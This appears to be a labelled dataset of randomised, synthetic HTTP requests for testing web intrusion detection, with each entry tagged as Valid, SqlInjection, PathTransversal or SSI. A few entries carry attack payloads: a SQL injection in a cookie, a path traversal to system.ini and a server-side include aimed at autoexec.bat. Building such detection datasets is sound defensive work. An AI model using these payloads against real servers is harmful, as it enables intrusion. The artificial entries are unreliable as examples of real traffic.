ETag: "16MjOgvHh0@ysMXRMaN"
Expect: meta
From: aVFabc@O7fpolootx.be
If-Modified-Since: Wed, 29 Apr 09 15:52:38 GMT
If-Unmodified-Since: Wed, 27 Jan 10 12:45:42 CET
If-Match: "yTcUyxx@dgGnFbD8Xu@"
If-None-Match: *
If-Range: "@ltkj@JFuhA1Gl@UU7c"
Max-Forwards: 4852
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: Basic bmxpZW1lZTpFeWFhYQ==
Authorization: Basic Z2hzbnA6ZHVlZA==
Range: 35260-775435,47-,92-626366
Referer: http://www.telyNchr.ch/woesftii/n0hnLrew.sh
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/4.0 (X11; U; Solaris 7.0; nh-a2; rv:6.8.0) Gecko/99925532
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 018x626
Via: 1.0 www.eBts.jpeg:0, 7.4 www.yjmoi.htm, 7.3 69.143.147.18
Transfer-Encoding: deflate
Upgrade: rr6/2.2, e3Shey/7.8, nrdxI/1.5
Warning: 447 37.2.170.213 "8reqteinidDfS9tu7r6" "Mon, 13 Mar 06 18:40:21 UTC"
X-Forwarded-For: 218.75.218.198
X-Serial-Number: 003791
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

VMxGMHX8c=3541125&oIynmfejr=lstn&2AeBawyeswods=55968332&3setSeqsxnerde=3eo;&Ayelsboeucraaah=58&D2yselect1=rul3edt5l8eiyfsrer&iwuhwi1e=2fa5hfenNnhie&aIds4hr2eaitta=ry 

End - Id: 6462
Start - Id: 16017
class: Valid
GET /ntvnncse4fnep/eQ4Hot/n56mit6UGJn8Zqb3sKq/jbagf3hs.jpeg?wot5uhsahnzw5r=hiFirtieit1eecd&.yeXi=907653&aa=27359&aojln4abn=oe%3Bmsp%3C%3Fn%3Detpsm&AiframeCL29g=%7Ctsei&1byplirkye=tr&gioebiunneesce=igidei3wil7ttt&asaehffnmOdhw=5oQrttIpenh9 HTTP/1.0
Host: 127.30.156.81
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: cp-936, x-mac-cyrillic, koi8-r
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 97.66.205.73
Cookie: eeqnsitnf7vr=0606;owl=d-a;xiE2eepOhtexw6s=oNd
Cookie2: $Version="517"
Date: Tue, 17 Nov 09 15:47:28 UTC
ETag: "hD-iZHKYJ7r2eIn32"
Expect: 100-continue
From: ioDenuTw@Aree.gov
If-Modified-Since: Sat, 28 Apr 07 01:24:22 GMT
If-Unmodified-Since: Mon, 28 Nov 05 24:50:53 UTC
If-Match: "ceqB@CruitwuF4lCc."
If-None-Match: *
If-Range: "ZknCJn_hWMmHRilPHjVh"
Max-Forwards: 3
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: NTLM YTRhZWlucW50M2dlb010NmxzdGxoNHFsanBJY3dzeWVhVnR3ZG1hSHRzZU5lbHR0
Authorization: Digest response="fb5bE3caBEc9bF1dFB8F41Cfe0Cd1285"
Range: 120-88552
Referer: /aen6w/oine/w6sLtsr.jpg
TE: trailers
Trailer: Pragma
User-Agent: 0q8tyw6rP/1.1
UA-CPU: MIPS
UA-Disp: 049,9339,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 273x3585
Via: FTP/8.0 www.iohelY.jpg:4392, FTP/0.4 216.3.151.249:164, FTP/9.3 116.118.151.232
Transfer-Encoding: identity
Upgrade: e51r5e/8.0
Warning: 561 www.ei17228.html "tww6cihanh" 
X-Forwarded-For: 199.28.224.223
X-Serial-Number: 72597578959631
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16017
Start - Id: 20184
class: Valid
GET /tuL3/ndwHa76q8/um2oAaedEgSnReuc/g-UowHeZf2/_QfMbodyVSpassthruUk7UhK/xh.tfvX.css?dedlol7trE=s&fstAsconnect=88&elHraL=+ot9execydropfxe%3F&ose=17396&48tdaIs=14674228&eiddyywfcokeelg=Ioo%3Algcg&6tarehsanm=43&3rntqriplNcewl=4&8oeifltsmoeei=neeysa&uu=+zeoo HTTP/1.0
Host: www.n6qo.be:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 124.87.119.255
Cookie: az9t=86794;h8we8crm=48624953;jeChkVs1Wo=o0a9aoai;Mslc2jnhcturi=ee68scjwhere;noait=rhawp-dsmtre
Cookie2: $Version="3"
Date: Tue, 20 Nov 07 10:34:54 UTC
ETag: W/"KUSqY8XHIZZ2RTr617"
Expect: 100-continue
From: bgcY@aessp.com
If-Modified-Since: Sun, 09 Sep 07 18:36:35 UTC
If-Unmodified-Since: Tue, 10 Feb 04 15:43:55 GMT
If-Match: "AoUIW5-ZxV@NqGXY"
If-None-Match: "fEwDHMCQIyx8A_K9pRT@"
If-Range: "ZX1-4eUNuNdkUI-RtKN"
Max-Forwards: 927
MIME-Version: 7.1
Pragma: 7sajll='2d3u0oup'
Proxy-Authorization: drij yiNes=2wtgpw
Authorization: Basic ZHVubnVzaTp6aGRu
Range: 365749-,607-065
Referer: http://www.eega.st/pexent/aTbuY/glh6/ttes.php3
TE: trailers
Trailer: Range
User-Agent: hw7edueys/4.4.0.5
UA-CPU: StrongARM
UA-Disp: 909,081,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4538x224
Via: mva/8.1 65.144.28.241, 4.3 130.217.17.134
Transfer-Encoding: identity
Upgrade: iscH/0.7, aieQ/3.5, toae/3.5
Warning: 651 88.213.252.125:060 "5sir4foalundnc" "Thu, 24 Mar 05 09:39:40 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 5166972697014969
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20184
Start - Id: 41325
class: SqlInjection
GET /onrAerrGienVntor/eWNjmogBdp7/ljHwp-1YhQu1Hvo/eRVqp5z8VkL/dneJ/sw7tTnw1gv3oSi/5tetgdr4oaati/rewAeemednenae/3lZmub90xu673cz/rhecznsiliDDl/dbGigxjq.Et/mLt.shtml?_OP7mD=fcswDT8 HTTP/1.1
Host: 92.112.13.30
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.9, gzip, deflate, deflate;q=0.7
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 135.135.250.141
Cookie: P8PJ=8536 or  id>5  or    ls_id<6079443;nakA=splsLea6odpyPnaa
Cookie2: $Version="74"
Date: Thu, 16 Jul 09 22:37:35 CET
ETag: "_UfSHDRMCQ2e7qbSD45"
Expect: 100-continue
If-Modified-Since: Mon, 25 Dec 06 09:33:23 GMT
If-Unmodified-Since: Thu, 29 Jul 04 12:00:18 UTC
If-Match: *
If-None-Match: "22p_qc4lBnsumlcv8"
If-Range: Sun, 28 Jan 07 03:46:10 UTC
Max-Forwards: 1
MIME-Version: 0.0
Pragma: a5=ciee
Proxy-Authorization: aOscx rtu8=4sni
Authorization: eiOlse meSia=ebceths
Range: 4-
Referer: /4budTrRr/aeveU/fimeu8tE/RnlIme8.php
TE: gzip;q=0.3,chunked
Trailer: Range
User-Agent: ihuvL4 (atXhZ7ma; pnbxzAy; ewtPgxMMSB)
UA-Disp: 343,7284,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 654x944
Via: FTP/1.5 www.yRdyrjh.css
Transfer-Encoding: identity
Upgrade: wNr3h/2.0, bss/8.7, iho/9.9
Warning: 731 www.cyyerh.gif:8 "drlplsjnceh" "Fri, 01 Dec 06 07:00:44 CET"
X-Forwarded-For: 94.64.57.114
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41325
Start - Id: 3596
class: Valid
GET /nl2S2c9OCH64/nssle3tfge5ramm/A1oaico/sfesi/reaouulejoPineo/nHQCGKgqeJMFBewWbFcJ/bc5OhRacC/euwi/ipjaDVyuM/ehzR-WVMFsamLvbetween/aMSgv4c57@galLj.jpg?gbvllEgZQW=179194316&ejazitThi=956941&uHnrDtYt=Eijiexech2&irmhtaqrAmwnfej=6&neeaCn=00029349&KJ1LJuldZ=henhhrs&hTab5=iabob HTTP/1.0
Host: 114.59.177.128
Connection: keep-alive
Accept: */*
Accept-Charset: euc-jp;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: naqlL='cao'
Client-ip: 69.247.202.218
Cookie: ich=8455
Cookie2: $Version="5"
Date: Thu, 15 Jun 06 05:12:56 CET
ETag: W/"AYf.4QD-BV@_gWB1v"
Expect: sMwaah
From: izCq@ns1arneDin.cz
If-Modified-Since: Sun, 12 Jul 09 03:10:53 CET
If-Unmodified-Since: Thu, 03 Aug 06 23:29:18 CET
If-Match: *
If-None-Match: "vDr9WXbcf3XZkRbDqUZV"
If-Range: *
Max-Forwards: 164
MIME-Version: 6.3
Pragma: oe='rihogo3a'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM Y3VvdGRpbzRzZW1lZGV2amt3Wm9EZHRsNHNjczRobFV0aXRlbW85ZWhpaGV3
Range: -276748,6-3375
Referer: /2ontq/dadid.mpg
TE: chunked;q=0.6,trailers
Trailer: If-Range
User-Agent: Mozilla/6.8 (X11; U; Linux i386 0.9; yu-yl; rv:4.4.4) Gecko/59780799
UA-CPU: MIPS
UA-Disp: 8239,236,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 9506x752
Via: qshev/9.3 www.htlg.js, HTTP/8.1 239.249.253.166, 5.1 www.irmigt4.png
Transfer-Encoding: gzip
Upgrade: aHnnn/4.7, e0Tge/7.4
Warning: 932 71.221.87.58:037 "otrydjbhnce4ha" 
X-Forwarded-For: 35.71.57.22
X-Serial-Number: 41732
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3596
Start - Id: 13875
class: Valid
GET /0divYxPfe/3PsAPpnOOi/yipsnedoenadozp0i/op/aLge2/ZKnSPqpsRVFkxhttp/_4acceptMgroup byLBVMEstdin76m/atqearsBidaNcyyimig4/ntttgaoqrnLeqese/._TS0GwU1L..asp?iaDU0extarkfn=0&Wt6lHks=240166576&sletdeshtmchh=%3Bnetcatupo&9bZxtermevalps=ez3MpZiEP8_3 HTTP/1.0
Host: www.roqI.ch
Connection: close
Accept: audio/x-wav, image/jpeg;q=0.2
Accept-Charset: windows-1255;q=0.8, iso-8859-9;q=0.9, windows-1255;q=0.7, iso-10646-ucs-2, koi8;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.2
Cache-Control: min-fresh=14
Client-ip: 186.36.241.93
Cookie: ekbderbe7uan=|rrhdsolunionG
Cookie2: $Version="026"
Date: Wed, 29 Sep 04 12:28:45 GMT
ETag: "QhyRC8cZ63TXUgZT4"
Expect: slaumekt
From: aopeat@lwiRaar.be
If-Modified-Since: Wed, 24 Jun 09 02:50:33 UTC
If-Unmodified-Since: Sun, 21 Aug 05 10:56:56 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 703
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: Digest response="476d9781f2eF45242eaDcdEd0B4AB78c"
Authorization: Digest uri=/rUwcSnc/hacdstp/ueiy/sxtreg/axeylI.tiff
Range: 3-
Referer: http://hgas.de/snvs.exe
TE: trailers,gzip;q=0.0,trailers
Trailer: Expect
User-Agent: Mozilla/8.7 (compatible; usTndtv8f; SunOS sun4u; i8yeehdy7m; oadjedr)
UA-CPU: Sparc
UA-Disp: 4060,2972,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 7739x7906
Via: 3.5 www.Noxti6e4.html:3, 7.1 www.ytcaete.html:896
Transfer-Encoding: gzip
Upgrade: dee/6.6, qx6San/1.4, EaHU/5.9, nHtl/9.9, narr/5.4
Warning: 748 www.r4heroq.png "rdie8oi9te4aho" 
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 02052575004924
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13875
Start - Id: 4565
class: Valid
PUT /iwni/41olvW_dpan/UXJtF/mhhlnune3dazaddsy/6iG6SJXY/Vc52sPM1al/0mhnatgsneMetnetue.gif? HTTP/1.0
Content-Length: 185
Content-Language: 5zhfmpH
Content-Encoding: gzip
Content-Location: /ik1iter/nlApIN/hsOe.jsp
Content-MD5: b3Z0ZGhSdGg3ZWxmVHNycg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 08 Jan 08 02:48:58 UTC
Last-Modified: Wed, 02 Feb 05 09:26:43 UTC
Host: www.wt0As.com:83
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: windows-874;q=0.4
Accept-Encoding: *;q=0.0
Accept-Language: s-tRcu, cEo0ftwS-ssicamR;q=0.3, srlbIE-wn2tnanr
Cache-Control: eo=Mtln
Client-ip: 251.25.184.155
Cookie: erhSnfkupiop5t=iNPVd@.M0uDd;en6iyiotTcsrf6=5050480282;aNyhTwrnoeotsc=(c ;unGaJreplaceN81l=twindow.opend;isCr1horkb=rcinnadhoornio;eopu=oruetnnegmnnf
Cookie2: $Version="429"
Date: Wed, 27 Sep 06 24:07:10 GMT
ETag: "zW77bKrZAKByOIO4G"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Sat, 02 Jul 05 22:53:52 GMT
If-Unmodified-Since: Mon, 12 Dec 05 16:41:40 CET
If-Match: *
If-None-Match: "dnv7G0kw@neuTqE-P"
If-Range: Wed, 27 May 09 01:02:35 UTC
Max-Forwards: 1283
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: uaahe i2mes2rD=Tlhhrotn
Authorization: Digest username="ahcsi5dO"
Range: 5-7
Referer: /yis16fs.bin
TE: trailers
Trailer: Host
User-Agent: mrirffE/3.9.8.4.6
UA-CPU: StrongARM
UA-Disp: 067,349,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 308x492
Via: 3.7 213.201.107.43, 4.3 www.p3eioult.html, 3.3 215.123.158.186:482
Transfer-Encoding: eacSea
Upgrade: y3ba/9.8
Warning: 705 www.nngiaGse.tiff "Rnwreurhh" "Thu, 25 Nov 04 12:35:07 GMT"
X-Forwarded-For: 41.244.54.15
X-Serial-Number: 4085142165405
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eanh7cougl5=26161065&aoinlqths=84315&o1wad0Cnrdzyy=>yot[e;s2nfdi&yoOtoeee=e.d4hCIk2&tgsSr=9970375374&Wnarect7=biYu&sUcHeetrtdte='bwd&nhavteashrtpm=oos7l&bYzw=cmdnuzeotmtoiloers7

End - Id: 4565
Start - Id: 26384
class: Valid
GET /nVbAxT/qaana.gif?fromx_execMFN=xovWDkjzc&rjbz=e%402qzjbc&esaie=aoesfndrj6d HTTP/1.0
Host: 16.250.223.184:59970
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=1
Client-ip: 1.175.59.116
Cookie: vaEPcW=E;rrrotsfciUamn=>atinputnph-w ontvari]enh
Cookie2: $Version="05"
Date: Fri, 24 Sep 04 22:42:52 GMT
ETag: W/"j8l-cMXG-Xolo6KfB0"
Expect: 100-continue
From: 8u9Mo@enowovqeu.com
If-Modified-Since: Fri, 08 May 09 06:43:52 CET
If-Unmodified-Since: Sun, 25 Mar 07 21:48:42 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 955
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="hehs"
Authorization: meauzt oi3rr=aniAdeol
Range: -954249,93-21781,60217-
Referer: http://www.Anfs2.st/7u2ers4.jpg
TE: trailers,deflate;q=0.6
Trailer: Pragma
User-Agent: Mozilla/5.4 (compatible; Konqueror/4.8; Win98; ntsryj4oed; eaco1j)
UA-CPU: StrongARM
UA-Disp: 146,5965,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 5346x326
Via: 9.8 www.adoct5l.css, 0.7 33.246.192.36, FTP/6.3 www.vxni.css
Transfer-Encoding: gzip
Upgrade: Yoanr/1.5, vNn/4.7, 7loa/0.1, nab9I/9.9, ale/2.7
Warning: 718 37.84.139.178 "edSoh8ruFnusxg4s" "Wed, 25 Feb 04 22:44:53 GMT"
X-Forwarded-For: 21.229.165.135
X-Serial-Number: 7631325909856
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26384
Start - Id: 6588
class: Valid
POST /ealsa/roN3XtBM.sl49sz/d./38ffd9fB/nistdc/GrJqwKYNr/b9iosuhATb/fyilGyaaaAekdSU2mwea/0Mh5gohvthGXf/XZvbscriptI-nP/HZaapuU7ZB@.jpeg? HTTP/1.0
Content-Length: 37
Content-Language: erhmeNk
Content-Encoding: gzip
Content-Location: http://hritQn.ch/biee.pl
Content-MD5: YmZyc2hlaGR4ZTZHZG1lcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Mar 07 10:23:59 UTC
Last-Modified: Tue, 28 Oct 08 13:26:52 UTC
Host: www.eqoi.it:80
Connection: close
Accept: audio/*;q=0.1, video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: y3-easw;q=0.0, ounmn3u-enrr;q=0.1, nx-Nddno;q=0.8, 7feeot-veeuOoou;q=0.3
Cache-Control: no-transform
Client-ip: 54.15.143.98
Cookie: SsRyU7v@8m=xtimoohbiuindA4r;oWeumGer=770740;0rtiemN=07;selnXehrloss=8355946139;LxZs=2https7
Cookie2: $Version="387"
Date: Thu, 03 Jan 08 20:00:21 GMT
ETag: "YShrRAu-qZm_-4ebtS"
Expect: incSs3s=ue0t
From: a5yto@mejtrtseta.ch
If-Modified-Since: Tue, 24 Mar 09 04:46:17 UTC
If-Unmodified-Since: Tue, 20 Mar 07 14:52:11 GMT
If-Match: *
If-None-Match: *
If-Range: "Oyg9FiciP_NKqiFg"
Max-Forwards: 368
MIME-Version: 0.1
Pragma: dk8tihcn=d8nioae
Proxy-Authorization: Digest algorithm=MD5
Authorization: pLe5 efaooexe=iT7mhnC
Range: -3876,430737-,39-
Referer: http://www.eSmUt.it/sauay/0fla7tl/mehd.jpeg
TE: gzip;q=0.8,deflate
Trailer: Authorization
User-Agent: bor6/0.5.4.9
UA-CPU: x86
UA-Disp: 0239,483,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2928x871
Via: 6.5 93.172.126.150
Transfer-Encoding: itc1e5
Upgrade: Goe/5.4
Warning: 015 www.S3hmat.js "rob00sy0uro5tLiaSgoN" 
X-Forwarded-For: 75.123.215.86
X-Serial-Number: 552358
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mntdbvn4m=;sdtblhometPettelnetlOIS 

End - Id: 6588
Start - Id: 34904
class: Valid
PUT /eAPKg3LvM6S9H5P/tZdxc/ctchxR5trse7kARadH/wir/laaaisfO6tod/w8-bmSbOJ0p/bt4fssioe7cyeUeetal/j@EA/ol7ninh9ineEis9ixmga/inile5oih/3htal8rrw5/ouood4.js? HTTP/1.0
Content-Length: 113
Content-Language: aou,lgsV,dHaad
Content-Encoding: identity
Content-Location: http://nnr9s.org/osadrip/rant/7se2tld.bin
Content-MD5: dGJ0b3RHZWphaFRhY25uaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Oct 09 17:27:07 GMT
Last-Modified: Sun, 11 Nov 07 04:12:44 UTC
Host: www.g1whtrqEi.de
Connection: close
Accept: audio/*;q=0.0, text/xml, application/rtf;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: n=vetr
Client-ip: 219.180.204.30
Cookie: eaiohsa9=tIztYw2;ejTShkapnfsllhp=aKr8zMtURkx;netjfdwc=cc3gykU
Cookie2: $Version="3"
Date: Sat, 09 Feb 08 19:20:23 UTC
ETag: "Nis_DstEZYgwQMFE"
Expect: 100-continue
From: auaes4Eh@tlwea3.gov
If-Modified-Since: Fri, 01 Dec 06 22:42:12 GMT
If-Unmodified-Since: Sat, 20 Nov 04 13:03:41 UTC
If-Match: "KrQtnrfnHxLg9lrF.J"
If-None-Match: "JcFvQrH5XhVPD87RlHwM"
If-Range: Fri, 22 Dec 06 07:58:50 UTC
Max-Forwards: 193
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: Digest nc=72e2B70C
Authorization: Digest qop=peetd
Range: 068382-
Referer: /oa3d/Eegleds/sjqa.php4
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 9.4; to-eO; rv:5.6.1) Gecko/69379458
UA-CPU: x86
UA-Disp: 559,503,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4336x049
Via: FTP/2.6 www.Ibta9h.gif:937, HTTP/2.9 www.erhhesp.html:494
Transfer-Encoding: deflate
Upgrade: deie/5.6, lOhrot/4.1, e2fa/2.7, pai8/9.3, ezl2x/0.4
Warning: 923 www.ae6zeji.gif "ehTBOdesiloean" "Wed, 16 Nov 05 14:42:52 GMT"
X-Forwarded-For: 69.156.101.181
X-Serial-Number: 5563045665
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iw=884&tft5=moo8rj)dehxle6i&Si=U<irithh23ceeu-?httpfromes&nhRage=)ni legame%f&C@6gD=325767&Be=ranxp_nyu

End - Id: 34904
Start - Id: 9727
class: Valid
GET /fmye/1Oodu3W/eqEj_a@ryXb01O_1oKGh.html?3Gpwinnt6kpassthruhyW=6013146&esuMujfen=n%3Df%25hoG&sna95yaeg=ttl%28&ojeek=shwoesmeye0a&det=3937684&NCmsme7pi8qtph=Vd%25uO%3Eatsm&emp93t0=h%25u1b5d%5Dd&mdn=icfLNN28H&yo7oetaBeeszcl=ese HTTP/1.1
Host: www.r1ysoa.fr:80
Connection: close
Accept: video/*;q=0.8, audio/basic;q=0.8, image/*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: cn-W;q=0.4
Cache-Control: max-stale=8
Client-ip: 85.207.245.91
Cookie: nlQet8oupts=execexp_F@(av &sG1vtmp
Cookie2: $Version="47"
Date: Thu, 04 Mar 04 19:57:35 GMT
ETag: "D8DPEOegwgODcRFajm"
Expect: doayf8c
From: a5e2p@0aodla.de
If-Modified-Since: Thu, 07 Jun 07 11:45:26 CET
If-Unmodified-Since: Wed, 18 Jan 06 22:56:35 CET
If-Match: *
If-None-Match: "UpFQ0VSOeSn7.geZ.X"
If-Range: "b.y934aBR7qb5_nGF95"
Max-Forwards: 2517
MIME-Version: 9.0
Pragma: E='oto'
Proxy-Authorization: Digest algorithm=MD5
Authorization: tanpT2 txgadh=me6n6r
Range: 56419-6047,31908-,-5753
Referer: http://www.easna4.it/Hfoir/rmpwvh5/oatla/no69u9/ctxwi.gz
TE: gzip;q=0.2,trailers,trailers
Trailer: Accept-Language
User-Agent: n6A029QDHM http://www.go5H.be
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6817x021
Via: FTP/1.9 180.130.77.60
Transfer-Encoding: compress
Upgrade: hie5vn/0.3
Warning: 162 www.odini6n.jpg "npswobidL" "Mon, 27 Aug 07 18:43:51 UTC"
X-Forwarded-For: 156.177.170.9
X-Serial-Number: 66630290652
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9727
Start - Id: 45502
class: PathTransversal
GET /i0FzpmdJQIbhMUQIW/agM8aG4-r/3XdJck_vc3a4nh0hVOU/qlrVbs_g9kAponPqRh/6BoKLuefsock_streamuMQ/aYmcrT/afeszosee3dni3nkmms/ewtoianWgmbovI/nYS-w2g/inputvuN/ifG/oN7ZRYvCV13ZJ3kmR.cfm?ec=aer9weadNl&rqdrtighouihnt4=454150713&yjuT=45692&a4e4eesa39mw=75509484&253iahtehim=15W2kBGaEyH&abf=rLbEeMSstylendhr&eegcmmL=35809186&4h0i2c9st3os=s7Rf&7eiyeeeytrt0f=046324&olei=%5CWINDOWS%5Csystem.ini&mtl=5arm7strfIn0otWh&8lGeltg=821718&iiSjieprTi5y=908465 HTTP/1.0
Host: 104.165.241.17:76
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: windows-1254, iso-8859-2, cp-950, x-mac-chinesetrad, windows-1255;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 242.28.183.196
Cookie: iriyleess3xw1a=sscVnKosYncglmdr7p;hnu6sp4pw=ls  Yietol:;ftpF-xHaxautoexec=es;bnPZ3d@NRwp-=a9inns;rRe5cnhv=2;axehelqe82ryswk=98546266
Cookie2: $Version="629"
Date: Thu, 15 Jan 09 08:37:32 UTC
ETag: W/"WNHs.jea5NTXT5QD"
Expect: 100-continue
From: resr4o@b7ostR1pai.cz
If-Modified-Since: Tue, 20 Apr 10 11:41:52 CET
If-Unmodified-Since: Sun, 01 May 05 03:29:42 CET
If-Match: *
If-None-Match: "3X65fxKnxeYPp5ve5JV"
If-Range: Thu, 04 Mar 04 09:36:04 GMT
Max-Forwards: 9260
MIME-Version: 4.8
Pragma: iieodQo='wgtedbsh'
Proxy-Authorization: Digest algorithm=noaen
Authorization: 0sdfe untLe=iocYnPo
Range: 354-,63882-
Referer: /xngda9N/neylffxf.png
TE: trailers,gzip
Trailer: Upgrade
User-Agent: llofHd (iQBNd_; e1C8LtHzE; uiI4KTK; fUP2Uwd)
UA-CPU: MIPS
UA-Disp: 970,9844,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: 3.9 216.203.247.210, 7.6 63.100.19.243, 5.6 www.gder.js:36936
Transfer-Encoding: compress
Upgrade: paa/8.6, yprO/1.1
Warning: 882 118.217.63.222 "etpoiZeexEopAili8v" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45502
Start - Id: 40713
class: SSI
PUT /bCzSJL.css? HTTP/1.0
Content-Length: 260
Content-Language: ltqdtjrt,a,gD
Content-Encoding: gzip
Content-Location: http://AnjSatiO.uk/smfo/deagno.jpeg
Content-MD5: Y2N5bGlJZEFlbmkwU0Vsbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 18 Aug 06 07:02:12 UTC
Host: 5.228.161.222
Connection: keep-alive
Accept: audio/*, video/quicktime;q=0.9
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=22202
Cookie: hsbl=t61hgowinntOscriptq;zaidTSdl6Na=@6sh-ahylink;fmsHe=<!--   #include     virtual="d:\windows\autoexec.bat" -->;mxfrimaIare=lcrcp9ydv\ g8Sko ksp[;he=09606422
Date: Tue, 26 Jun 07 05:57:09 GMT
If-Modified-Since: Fri, 21 Sep 07 11:10:38 CET
If-Unmodified-Since: Sat, 16 May 09 12:27:59 CET
If-None-Match: *
Max-Forwards: 02
Pragma: no-cache
Proxy-Authorization: ec1ho frtpetre=ecojee
Authorization: NTLM cGZlbTFydUU2aGxyaGFobmhlM2UyZXB0YXRwVmhJbnc=
Referer: /oseijtr/teflfEt/bo2l/zrh4eR/oe3iqeb.js
User-Agent: ljsiHsxrbi1apxN
Transfer-Encoding: compress
Upgrade: sndxot/3.2
Warning: 772 92.46.147.84:11810 "5yesMkreorotea" "Tue, 16 Mar 04 07:36:17 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

teboaorhrl=76473004&o4s=a6dbmyul7&eiddar3eararid=azxgCYQ&tiohhotnpior5be=26&Bhsock_streamH3Ag2-Tv=z@jwn@HNASh&aece=sd2s1mOta4hwotea&nicstEdAeAoi=u&tNrssdRiM=n1twp&OZN9yZ=ubrm(Ewlcdta'y$L/sL&dzaeieSnt3essdi=a7n&TzQnaie1=6538&otyctuexntueix=1wmu6nkog

End - Id: 40713
Start - Id: 27883
class: Valid
GET /Wbgsounde5/iaaglaidilaa/agz/9fed3x4kVX/2YgBhedykg7by4gv/i1/rkLGCIauRhmlbhA..pl?sl=l36&lr4hoeeitrh9=bob9hnaidi%29uai HTTP/1.0
Host: www.tksads.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 218.21.80.173
Cookie: zzmee1Ae=g3al84rDg7;4sh4eEgr6mt=90zd
Cookie2: $Version="9"
Date: Tue, 05 Jan 10 22:55:07 CET
ETag: "3bi8TVg5_pidMUIy"
Expect: hdrtkeu
From: naOe@fsh5cXZ.uk
If-Modified-Since: Mon, 24 Nov 08 06:53:22 UTC
If-Unmodified-Since: Wed, 22 Dec 04 04:57:03 UTC
If-Match: *
If-None-Match: "KP5EZW@g2hMxDB0"
If-Range: Sat, 28 Oct 06 23:25:01 GMT
Max-Forwards: 9858
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM b0VoYXhubGVlYWZSdG5uZTdnQW4ydGl0Y3NobnIyZWVp
Authorization: Basic SGVucmVlRW86OWV0eVI=
Range: 334528-3,129-5609,255074-1318
Referer: http://www.62epHC.com/aIricttf.png
TE: trailers,trailers,trailers
Trailer: Accept-Encoding
